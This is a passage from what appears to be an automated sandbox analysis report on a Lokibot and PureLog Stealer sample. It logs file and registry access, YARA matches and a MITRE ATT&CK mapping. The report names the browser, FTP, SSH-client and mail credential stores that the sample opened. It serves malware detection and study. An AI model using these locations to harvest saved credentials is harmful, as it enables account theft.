                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeQueries volume information: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Lokibot
                      Source: Yara matchFile source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.gunzipped.exe.47d96c8.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.gunzipped.exe.47f36e8.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: gunzipped.exe PID: 6640, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: mPvIOxEZXJsdYp.exe PID: 7368, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: mPvIOxEZXJsdYp.exe PID: 7608, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 00000007.00000002.1966713417.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: gunzipped.exe PID: 7328, type: MEMORYSTR
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.gunzipped.exe.76c0000.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.gunzipped.exe.3d49970.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.gunzipped.exe.3d49970.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.gunzipped.exe.76c0000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1735179615.0000000003D49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1739547290.00000000076C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Users\user\Desktop\gunzipped.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\Desktop\gunzipped.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Users\user\Desktop\gunzipped.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\Desktop\gunzipped.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                      Tries to steal Mail credentials (via file registry)
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: PopPassword13_2_0040D069
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: SmtpPassword13_2_0040D069
                      Source: Yara matchFile source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.gunzipped.exe.47d96c8.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.gunzipped.exe.47f36e8.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.gunzipped.exe.76c0000.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.gunzipped.exe.3d49970.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.gunzipped.exe.3d49970.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.gunzipped.exe.76c0000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1735179615.0000000003D49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1739547290.00000000076C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		111
                      Process Injection                      		1
                      Masquerading                      		2
                      OS Credential Dumping                      		121
                      Security Software Discovery                      		Remote Services1
                      Email Collection                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      DLL Side-Loading                      		1
                      Scheduled Task/Job                      		11
                      Disable or Modify Tools                      		2
                      Credentials in Registry                      		1
                      Process Discovery                      		Remote Desktop Protocol11
                      Archive Collected Data                      		1
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      DLL Side-Loading                      		41
                      Virtualization/Sandbox Evasion                      		Security Account Manager41
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin Shares2
                      Data from Local System                      		1
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                      Process Injection                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput Capture111
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                      Deobfuscate/Decode Files or Information                      		LSA Secrets1
                      File and Directory Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                      Obfuscated Files or Information                      		Cached Domain Credentials13
